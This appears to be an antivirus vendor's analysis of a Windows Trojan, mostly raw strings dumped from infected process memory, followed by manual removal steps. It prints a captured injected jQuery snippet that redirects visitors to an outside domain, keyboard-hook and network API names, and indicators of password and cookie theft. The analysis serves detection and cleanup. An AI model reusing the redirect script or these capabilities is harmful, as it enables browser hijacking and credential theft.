SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Version

\cbscore.dll

0.0.0.1

\wrpint.dll

Software\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending

%s\%s

.WorkingDirectory

\CbsPersist_*.*

"%s" %s %s

\CbsPersist_*.log

makecab.exe

%s\CbsPersist_dddddd.log

\CBS.log

SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing

wdscore.dll

SxsStore.dll

Windows Modules Installer

6.1.7601.17514 (win7sp1_rtm.101119-1850)

TrustedInstaller.exe

Windows

Operating System

6.1.7601.17514

nwtray.exe_1456_rwx_69722000_00002000:

.ri3J

-yiq.yiw

-yiq.yi

RegAsm.exe_1676_rwx_00400000_00121000:

`.rsrc

SSh8*K

.hP6K

PSSSSSSh

Gt.Ht$

t.jGZf;

PSSShl

PVSShl

j.Zf;

;K|s%f

Jv.AKv

?#%X.y

GetProcessWindowStation

operator

kernel32.dll

oleaut32.dll

RegDeleteKeyExW

advapi32.dll

Error text not found (please report)

operand of unlimited repeat could match the empty string

POSIX named classes are supported only within a class

erroffset passed as NULL

POSIX collating elements are not supported

this version of PCRE is compiled without UTF support

PCRE does not support \L, \l, \N{name}, \U, or \u

support for \P, \p, and \X has not been compiled

this version of PCRE is not compiled with Unicode property support

\N is not supported in a class

zcÁ

GetProcessHeap

CreatePipe

GetWindowsDirectoryW

GetCPInfo

RegDeleteKeyW

RegEnumKeyExW

RegCreateKeyExW

RegOpenKeyExW

RegCloseKey

SetViewportOrgEx

ShellExecuteExW

SHFileOperationW

ShellExecuteW

RegisterHotKey

GetKeyboardLayoutNameW

ExitWindowsEx

EnumThreadWindows

UnregisterHotKey

keybd_event

GetAsyncKeyState

SetKeyboardState

GetKeyboardState

GetKeyState

VkKeyScanW

EnumWindows

EnumChildWindows

MapVirtualKeyW

CloseWindowStation

SetProcessWindowStation

OpenWindowStationW

InternetCrackUrlW

HttpQueryInfoW

HttpOpenRequestW

HttpSendRequestW

FtpOpenFileW

FtpGetFileSize

InternetOpenUrlW

##@,&,//,))

.jQG2

3(-,'')-*/%'

9(***3).**-)'

H%d=j@

0!;....(

.text

`.rdata

@.data

.rsrc

@.reloc

_!0}129=

@.MfT

n..GGHHH

n...GGHHH

n ....HGHHHH

n  ....G.HHH

~~~~{~{{{{

n!! ....HGHHHH

n!!  .....HHHHHH

!!!  ....GGHHH

!!"".....HHHHnv

"""...-.nv

%SV@Gd

^hT%F

%uywu

.aO.$M

.Xap=

4[2Y%D

d}.HR

3-%Uo

..EeQ

y1W.xRV

.vttU

.%F:{

rWz.kS

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

COMDLG32.dll

GDI32.dll

IPHLPAPI.DLL

MPR.dll

ole32.dll

OLEAUT32.dll

PSAPI.DLL

SHELL32.dll

USER32.dll

USERENV.dll

UxTheme.dll

VERSION.dll

WININET.dll

WINMM.dll

WSOCK32.dll

mscoree.dll

combase.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

USER32.DLL

>>>AUTOIT NO CMDEXECUTE<<<

CMDLINERAW

CMDLINE

/AutoIt3ExecuteLine

/AutoIt3ExecuteScript

APPSKEY

789:;<=>?

FTPSETPROXY

GUICTRLRECVMSG

GUICTRLSENDMSG

GUIGETMSG

GUIREGISTERMSG

HOTKEYSET

HTTPSETPROXY

HTTPSETUSERAGENT

ISKEYWORD

MSGBOX

REGENUMKEY

SHELLEXECUTE

SHELLEXECUTEWAIT

TCPACCEPT

TCPCLOSESOCKET

TCPCONNECT

TCPLISTEN

TCPNAMETOIP

TCPRECV

TCPSEND

TCPSHUTDOWN

TCPSTARTUP

TRAYGETMSG

UDPBIND

UDPCLOSESOCKET

UDPOPEN

UDPRECV

UDPSEND

UDPSHUTDOWN

UDPSTARTUP

SendKeyDelay

SendKeyDownDelay

TCPTimeout

WINDOWSDIR

AUTOITEXE

HOTKEYPRESSED

%s (%d) : ==> %s.:

Line %d:

Line %d (File "%s"):

%s (%d) : ==> %s:

AutoIt script files (*.au3, *.a3x)

*.au3;*.a3x

All files (*.*)

04090000

%u.%u.%u.%u

0.0.0.0

Mddddd

"%s" (%d) : ==> %s:

\??\%s

GUI_RUNDEFMSG

AUTOITCALLVARIABLE%d

255.255.255.255

Keyword

AUTOIT.ERROR

Null Object assignment in FOR..IN loop

Incorrect Object type in FOR..IN loop

3, 3, 12, 0

HKEY_LOCAL_MACHINE

HKEY_CLASSES_ROOT

HKEY_CURRENT_CONFIG

HKEY_CURRENT_USER

HKEY_USERS

%d/d/d

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.

Missing operator in expression."Unbalanced brackets in expression.

Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.

0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.

Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.

Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.

3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.

Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.

String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.

2.2.0.1

conhost.exe_2512:

.text

`.data

.rsrc

@.reloc

GDI32.dll

USER32.dll

msvcrt.dll

ntdll.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

KERNEL32.dll

IMM32.dll

ole32.dll

OLEAUT32.dll

PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected

Invalid message 0x%x

InitExtendedEditKeys: Unsupported version number(%d)

Console init failed with status 0x%x

CreateWindowsWindow failed with status 0x%x, gle = 0x%x

InitWindowsStuff failed with status 0x%x (gle = 0x%x)

InitSideBySide failed create an activation context. Error: %d

GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.

GetModuleFileNameW failed %d.

Invalid EventType: 0x%x

Dup handle failed for %d of %d (Status = 0x%x)

Couldn't grow input buffer, Status == 0x%x

InitializeScrollBuffer failed, Status = 0x%x

CreateWindow failed with gle = 0x%x

Opening Font file failed with error 0x%x

\ega.cpi

NtReplyWaitReceivePort failed with Status 0x%x

ConsoleOpenWaitEvent failed with Status 0x%x

NtCreatePort failed with Status 0x%x

GetCharWidth32 failed with error 0x%x

GetTextMetricsW failed with error 0x%x

GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x

RtlStringCchCopy failed with Status 0x%x

Cannot allocate 0n%d bytes

|%SWj

O.fBf;

ReCreateDbcsScreenBuffer failed. Restoring to CP=%d

Invalid Parameter: 0x%x, 0x%x, 0x%x

ConsoleKeyInfo buffer is full

Invalid screen buffer size (0x%x, 0x%x)

SetROMFontCodePage: failed to memory allocation %d bytes

FONT.NT

Failed to set font image. wc=x, sz=(%x,%x)

Failed to set font image. wc=x sz=(%x, %x).

Failed to set font image. wc=x sz=(%x,%x)

FullscreenControlSetColors failed - Status = 0x%x

FullscreenControlSetPalette failed - Status = 0x%x

WriteCharsFromInput failed 0x%x

WriteCharsFromInput failed %x

RtlStringCchCopyW failed with Status 0x%x

CreateFontCache failed with Status 0x%x

FTPh

\>.Sj

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

GetKeyboardState

UnhookWindowsHookEx

SetWindowsHookExW

GetKeyState

ActivateKeyboardLayout

GetKeyboardLayoutNameA

GetKeyboardLayoutNameW

_amsg_exit

_acmdln

ShipAssert

NtReplyWaitReceivePort

NtCreatePort

NtEnumerateValueKey

NtQueryValueKey

NtOpenKey

NtAcceptConnectPort

NtReplyPort

SetProcessShutdownParameters

GetCPInfo

conhost.pdb

%$%a%b%V%U%c%Q%W%]%\%[%

%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%

version="5.1.0.0"

name="Microsoft.Windows.ConsoleHost"

<requestedExecutionLevel

name="Microsoft.Windows.ConsoleHost.SystemDefault"

publicKeyToken="6595b64144ccf1df"

name="Microsoft.Windows.SystemCompatible"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

< =$>:>@>

2%2X2

%SystemRoot%

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen

WindowSize

ColorTableu

ExtendedEditkeyCustom

ExtendedEditKey

Software\Microsoft\Windows\CurrentVersion

\ !:=/.<>;|&

%d/%d

cmd.exe

desktop.ini

\console.dll

%d/%d

6.1.7601.17641 (win7sp1_gdr.110623-1503)

CONHOST.EXE

Windows

Operating System

6.1.7601.17641

ntvdm.exe_952:

.text

`.data

.rsrc

@.reloc

KERNEL32.dll

NTDLL.DLL

ADVAPI32.dll

GDI32.dll

USER32.dll

sfc.dll

sfc_os.DLL

SHELL32.dll

SoftPC

mscoree.dll

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

Invalid parameter passed to C runtime function.

GetProcessWindowStation

USER32.DLL

d:\w7rtm\base\mvdm\softpc.new\base\video\video.c

BIOS keyboard buffer overflow

hardware keyboard buffer overflow

%s Mouse %d.01 already installed

%s Mouse %d.01 installed

d:\w7rtm\base\mvdm\softpc.new\host\src\nt_timer.c

d:\w7rtm\base\mvdm\softpc.new\host\src\nt_eoi.c

C:\IBMBIO.SYS

C:\IO.SYS

C:\IBMDOS.SYS

C:\MSDOS.SYS

\ntio404.sys

\ntio411.sys

\ntio412.sys

\ntio804.sys

\ntio.sys

%s %lxh

d:\w7rtm\base\mvdm\softpc.new\host\src\nt_com.c

d:\w7rtm\base\mvdm\softpc.new\host\src\config.c

Software\Microsoft\Windows NT\CurrentVersion\WOW\Console

\\.\$VDMLPT2

\\.\$VDMLPT3

\\.\$VDMLPT1

FONT.NT

\ega.cpi

d:\w7rtm\base\mvdm\softpc.new\host\src\nt_fulsc.c

Drive %c:

Incompatible DOS diskette, C H R N = %d %d %d %d

\\.\A:

\\.\?:

d:\w7rtm\base\mvdm\softpc.new\host\src\nt_event.c

cmd.exe

WINDOWS VMM 4.0

WINDOWS NT 3.1

WINDOWS 386 3.0

WINDOWS 286 3.0

\_default.pif

d:\w7rtm\base\mvdm\softpc.new\host\src\nt_det.c

VrRemoveOpenNamedPipeInfo

VrConvertLocalNtPipeName

VrAddOpenNamedPipeInfo

VrIsNamedPipeHandle

VrIsNamedPipeName

VrWriteNamedPipe

VrReadNamedPipe

midiOutShortMsg

midiOutLongMsg

d:\w7rtm\base\mvdm\softpc.new\host\src\nt_hosts.c

NtDeviceIoControlFile failed %x

d:\w7rtm\base\mvdm\softpc.new\host\src\nt_sec.c

SoftPc: NtDeCommitVirtualMemory failed !!!! Status = %lx

NTVDMD.DLL

Check Keyboard Status

\ntdos404.sys

\ntdos411.sys

\ntdos412.sys

\ntdos804.sys

\ntdos.sys

demDosDispCall %s

config.nt

PIPE

%c:%sNUL

Software\Microsoft\Windows\CurrentVersion\Setup

Unimplemented SVC %d

Software\Microsoft\Windows NT\CurrentVersion\WOW

tmp dir is <%s>

env var is <%s>

InitFileRedirect:%s ;

RedirectShortFileName: to:<%s>

RedirectShortFileName: from <%s>

RedirectShortEnvVar: to <%s>

RedirectShortEnvVar: <%s>

RedirectLongFileName: to <%s>

RedirectLongFileName: <%s>

%SystemRoot%

%SystemDrive%\Temp

%SystemRoot%\Temp

%s=%s%s /p %s\system32

%s=%3.3u,%3.3u,%s\system32\%s.sys%s

Error Code 0x%x

Software\Microsoft\Windows NT\CurrentVersion\WOW\CmdLine

krnl386.exe

%s - %s

COMMAND.COM

KEYB

\KEYBOARD.SYS

\KEYJ31.SYS

\KEY02.SYS

\KEY01.SYS

\KEYAX.SYS

%s,%d,%s

\KB16.COM

DosKeybIDs

System\CurrentControlSet\Control\Keyboard Layout\

DosKeybCodes

00000409

Software\Microsoft\Windows NT\CurrentVersion\WOW\Compatibility

ntvdm.exe

d:\w7rtm\base\mvdm\dpmi32\buffer.c

Broken pipe

Inappropriate I/O control operation

Operation not permitted

ega.rom

vga.rom

v7vga.rom

bios4.rom

bios1.rom

profile.spc

.spcprofile

d:\w7rtm\base\mvdm\softpc.new\host\src\x86_emm.c

CS:x IP:x OP:x x x x x

ntvdm.pdb

YtYHt.Hut

t.VVVV

t.IIt

SSSSh

~,WSSh

QSSSSh

PSSSSh

SSSSSh

j.Yf;

9t.Ht

s'f;O%s!

V<%ue

tK<%uAj

Ht.HuL

t4HtPHt.Ht

Ht.Ht

|.WSV

GetCPInfo

GetConsoleOutputCP

NtEnumerateValueKey

NtOpenKey

ntdll.dll

RegCloseKey

RegQueryInfoKeyA

RegOpenKeyExA

GetSystemWindowsDirectoryA

GetWindowsDirectoryA

SetConsoleOutputCP

SetConsoleKeyShortcuts

VDMConsoleOperation

GetConsoleKeyboardLayoutNameA

EnumWindows

GetKeyState

VkKeyScanW

MapVirtualKeyA

GetKeyboardType

GetProcessHeap

SoftPcEoi

cmdCheckTemp

cmdCheckTempInit

demIsShortPathName

'?--?1-?6-?:-??-??-:?-6?-1?--?1-?6-?:-??-:?-6?-1?--?--?1-?6-?:-??-:?-6?-1?

$$$(((---222888???

!"#$%&'(

SoftPC-AT Version 3

89:;<=>?

autoexec.nt

00030<0?0

30333<3?3

<0<3<<<?<

?0?3?<???

!"#$%&'()

Software\Microsoft\Windows NT\CurrentVersion\Terminal Server

\System32\command.com

zcÁ

C:\Windows\system32\ntvdm.exe

\\.\B:

COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM

C:\Windows

6$6(6,606

< <*<`<~<

4L4K4Q4o4

7-8}8

;<<@<\<`<

2 2$2(2,2024282

KERNEL32.DLL

KERNELBASE.DLL

kernel32.dll

kernelbase.dll

Microsoft.Windows.NTVDM

tWOW32.DLL

VDMREDIR.DLL

WINMM.DLL

NTVDM.EXE

6.1.7600.16385 (win7_rtm.090713-1255)

Windows

Operating System

6.1.7600.16385

5The NTVDM CPU has encountered an illegal instruction."Internal error in NTVDM procedure.#NTVDM does not support a ROM BASIC.BFailure to allocate the requested number of Expanded Memory pages.*A continuous RESET state has been entered.

LAn installation file required by NTVDM is missing, execution must terminate.

Insufficient memory resources.=The NTVDM CPU has encountered an unsupported 386 instruction.TThe EMM command line in your config.nt contains invalid parameters or syntax errors.5The NTVDM CPU has encountered an unhandled exception.t

MS-DOS program files must end with the extension .EXE, .COM, or .BAT.

vAn application has attempted to %s, which cannot be supported. This may cause the application to function incorrectly./directly access an incompatible diskette format

16 bit Windows Subsystem

VThe system file is not suitable for running MS-DOS and Microsoft Windows applications."Memory error during intialization.

A temporary file needed for initialization could not be created or could not be written to. Make sure that the directory path exists, and disk space is available.-This system does not support fullscreen mode.?Insufficient memory to load installable Virtual Device Drivers.8Virtual Device Driver format in the registry is invalid.?An installable Virtual Device Driver failed Dll initialization.

Unable to lock for exclusive access. Another application may be using the drive. When the other application has finished using the drive you may retry the operation.

Drive %c: ZThe Application attempted to enable DOS graphics mode. DOS graphics mode is not supported.

Function failed$NTVDM has encountered a System Error*Driver does not support selected Baud Rate<The system cannot open %s port requested by the application.

ntvdm.exe_952_rwx_00000000_00010000:

C:\USERS\ADM\APPDATA\ROAMING\MICROS~1\LOG\PASS.EXE

PASS EXE

."/\[]:|<> =;,

c:\wina20.386

%WinDir%\SYSTEM32\COUNTRY.SYS

<html xmlns="hXXp://VVV.

89:;<=>?

1234567890-=

!@#$%^&*()_

789-456 1230.

!"#$%&,-./012

t.exe

%WinDir%\SYSTEM32\COMMAND.COM

%File allocation table bad, drive %1

Invalid COMMAND.COM

!Press any key to continue . . .

Cannot execute %1

Error in EXE file

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs786B.tmp

arameter vaCOMSPEC=%WinDir%\SYSTEM32\COMMAND.COM

OS=Windows_NT

PATH=C:\Perl\site\bin;C:\Perl\bin;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WINDOW~1\v1.0\;c:\PROGRA~1\WIRESH~1

PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC

PSMODULEPATH=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\

SYSTEMROOT=C:\Windows

WINDOWS_TRACING_FLAGS=3

WINDOWS_TRACING_LOGFILE=C:\BVTBin\Tests\installpackage\csilogfile.log

COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM

<html xmlns="hXXp://VVV.w3.org/1999/xhtml">

<script src="hXXp://ak2.imgaft.com/scri

t/jquery-1.3.1.min.js" type="text/javascript"></script>

$(document).ready(function () {

jQuery.ajax({ url: 'hXXp://mcc.securepaynet.net/parked/park.aspx/?q=pFHmpGOcZ2ImrGOdYaOvrvHlAzM2pFHmpGRlZQV5BQNmAvHlAzA2pFHmpF04ZQH4ZGN1ZGx2ZwxkZmR5BGZjWGV2MJpyZ3RlZQR3ZQVlAGN4ZQN1ZFHlAzA5WGAkZwt4At==-1', dataType: 'jsonp', type: 'GET', jsonpCallback: 'parkcallback',

success: function (data) { if (data["returnval"] != null) { window.location.href = 'hXXp://0v3rfl0w.com?nr='   data["returnval"]; } else { window.location.href = 'hXXp://0v3rfl0w.com?hg=0' } }

\COMMAND.COM

COMSPEC=\COMMAND.COM

BMicrosoft(R) Windows DOS

FCOMMAND [[drive:]path] [device] [/E:nnnnn] [/P] [/C string] [/MSG]

H [drive:]path Specifies the directory containing COMMAND.COM file.

N /MSG Specifies that all error messages be stored in memory. You

%Intermediate file error during pipe

Switches may be preset in the DIRCMD environment variable. Override

>Quits the COMMAND.COM program (command interpreter).

]Displays or sets a search path for executable files.

$B | (pipe)

%Displays the MS-DOS version.

LRecords comments (remarks) in a batch file or CONFIG.SYS.

key to continue...."

PATH=PROMPT=COMSPEC=DIRCMD=

.COM.EXE.BAT?VBAPWRHSvDANEDSG

%WinDir%\SYSTEM32

[]|<> =;"

ntvdm.exe_952_rwx_00010000_00090000:

COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs786B.tmp

89:;<=>?

D%WinDir%\SYSTEM32\HIMEM.SYS

Q001,437,%WinDir%\SYSTEM32\COUNTRY.SYS

S%WinDir%\SYSTEM32\COMMAND.COM

/P %WinDir%\SYSTEM32

/P %WinDir%\SYSTEM32

%WinDir%\SYSTEM32\COUNTRY.SYS

[]|<> =;"

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs7790.tmp

%WinDir%\SYSTEM32\COMMAND.COM

NTCMDPROMPTT

Unrecognized command in CONFIG.SYS

Insufficient memory for COUNTRY.SYS file

Incorrect order in CONFIG.SYS line $Error in CONFIG.SYS line $WARNING! Logical drives past Z: exist and will be ignored

1234567890-=

!@#$%^&*()_

789-456 1230.

!"#$%&,-./012

00030<0?0

30333<3?3

<0<3<<<?<

?0?3?<???

Windows NT MS-DOS subsystem Mouse Driver

/)()(00)(

/@%}-{.Nb#b

t.exe

!Press any key to continue . . .

%Intermediate file error during pipe

Switches may be preset in the DIRCMD environment variable. Override

>Quits the COMMAND.COM program (command interpreter).

]Displays or sets a search path for executable files.

$B | (pipe)

%Displays the MS-DOS version.

LRecords comments (remarks) in a batch file or CONFIG.SYS.

key to continue...."

PATH=PROMPT=COMSPEC=DIRCMD=

.COM.EXE.BAT?VBAPWRHSvDANEDSG

%WinDir%\SYSTEM32\DOSX

NT.EXE

PASS all

C:\USERS\ADM\APPDATA\ROAMING\MICROS~1\LOG\PASS.EXE

nt.exe

DOSX.EXE

ntvdm.exe_952_rwx_000A0000_0002B000:

66666666

6666666666666666

6666666676666666

6666667076666666

66666666666

66666707666

66666666666666666666

66666666666707666666

6666666666666

89:;<=>?

'/7?-16:?

V M ware, Inc. VBE support 2.0

ntvdm.exe_952_rwx_000CB000_00011000:

COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM

OS=Windows_NT

PATH=C:\Perl\site\bin;C:\Perl\bin;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WINDOW~1\v1.0\;c:\PROGRA~1\WIRESH~1

PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC

PSMODULEPATH=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\

SYSTEMROOT=C:\Windows

WINDOWS_TRACING_FLAGS=3

WINDOWS_TRACING_LOGFILE=C:\BVTBin\Tests\installpackage\csilogfile.log

C:\Windows\system32\DOSX.EXE

C:\Windows\system32\mscdexnt.exe

C:\Windows\system32\redir

nt.exe

C:\LANMAN.DOS

C:\Windows\system32\dosx

C:\Windows\SYSTEM.INI

STEM.INI

SYSTEM.INI

ntvdm.exe_952_rwx_000DC000_0000C000:

07/02/2012

000000000000

Keyboard

[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]

ntvdm.exe_952_rwx_000E8000_00008000:

00030<0?0

30333<3?3

<0<3<<<?<

?0?3?<???

Windows NT MS-DOS subsystem Mouse Driver

ntvdm.exe_952_rwx_000F0000_00010000:

.Yf[X

:[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]

!"#$%&'()* ,-./0123456789:;<=>?

Operating System not found

Operating System not found, retrying boot now...

Operating System not found, retrying boot in

Windows XP Mode active

07/02/12

13:45:02

00/00/00

00:00:00

.BCPNV

1234567890-=

ntvdm.exe_952_rwx_00100000_00010000:

C:\USERS\ADM\APPDATA\ROAMING\MICROS~1\LOG\PASS.EXE

PASS EXE

."/\[]:|<> =;,

c:\wina20.386

%WinDir%\SYSTEM32\COUNTRY.SYS

<html xmlns="hXXp://VVV.

89:;<=>?

1234567890-=

!@#$%^&*()_

789-456 1230.

!"#$%&,-./012

t.exe

%WinDir%\SYSTEM32\COMMAND.COM

%File allocation table bad, drive %1

Invalid COMMAND.COM

!Press any key to continue . . .

Cannot execute %1

Error in EXE file

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs786B.tmp

arameter vaCOMSPEC=%WinDir%\SYSTEM32\COMMAND.COM

OS=Windows_NT

PATH=C:\Perl\site\bin;C:\Perl\bin;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WINDOW~1\v1.0\;c:\PROGRA~1\WIRESH~1

PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC

PSMODULEPATH=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\

SYSTEMROOT=C:\Windows

WINDOWS_TRACING_FLAGS=3

WINDOWS_TRACING_LOGFILE=C:\BVTBin\Tests\installpackage\csilogfile.log

COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM

<html xmlns="hXXp://VVV.w3.org/1999/xhtml">

<script src="hXXp://ak2.imgaft.com/scri

t/jquery-1.3.1.min.js" type="text/javascript"></script>

$(document).ready(function () {

jQuery.ajax({ url: 'hXXp://mcc.securepaynet.net/parked/park.aspx/?q=pFHmpGOcZ2ImrGOdYaOvrvHlAzM2pFHmpGRlZQV5BQNmAvHlAzA2pFHmpF04ZQH4ZGN1ZGx2ZwxkZmR5BGZjWGV2MJpyZ3RlZQR3ZQVlAGN4ZQN1ZFHlAzA5WGAkZwt4At==-1', dataType: 'jsonp', type: 'GET', jsonpCallback: 'parkcallback',

success: function (data) { if (data["returnval"] != null) { window.location.href = 'hXXp://0v3rfl0w.com?nr='   data["returnval"]; } else { window.location.href = 'hXXp://0v3rfl0w.com?hg=0' } }

\COMMAND.COM

COMSPEC=\COMMAND.COM

BMicrosoft(R) Windows DOS

FCOMMAND [[drive:]path] [device] [/E:nnnnn] [/P] [/C string] [/MSG]

H [drive:]path Specifies the directory containing COMMAND.COM file.

N /MSG Specifies that all error messages be stored in memory. You

%Intermediate file error during pipe

Switches may be preset in the DIRCMD environment variable. Override

>Quits the COMMAND.COM program (command interpreter).

]Displays or sets a search path for executable files.

$B | (pipe)

%Displays the MS-DOS version.

LRecords comments (remarks) in a batch file or CONFIG.SYS.

key to continue...."

PATH=PROMPT=COMSPEC=DIRCMD=

.COM.EXE.BAT?VBAPWRHSvDANEDSG

%WinDir%\SYSTEM32

[]|<> =;"

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

systeminfo.exe:2876
netsh.exe:3392
netsh.exe:3008
rundll32.exe:1912
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs7790.tmp (335 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs786B.tmp (269 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\uwvcbwk (1960 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut53F9.tmp (588 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\dllhost.exe (53 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\pass.exe (773 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\Passwords.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut2B15.tmp (588 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\Cookies.sqlite (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\icanhazip_com[1].txt (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jhpcqgh (1960 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\T3SAKMRE\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\VJOQ962C\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\9M0U960C\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\Q9A9DPUD\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\WinRAR\nwtray.exe (4545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\WinRAR\nvvswc.exe (9 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"dllhost" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\AutoUpdate.exe"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

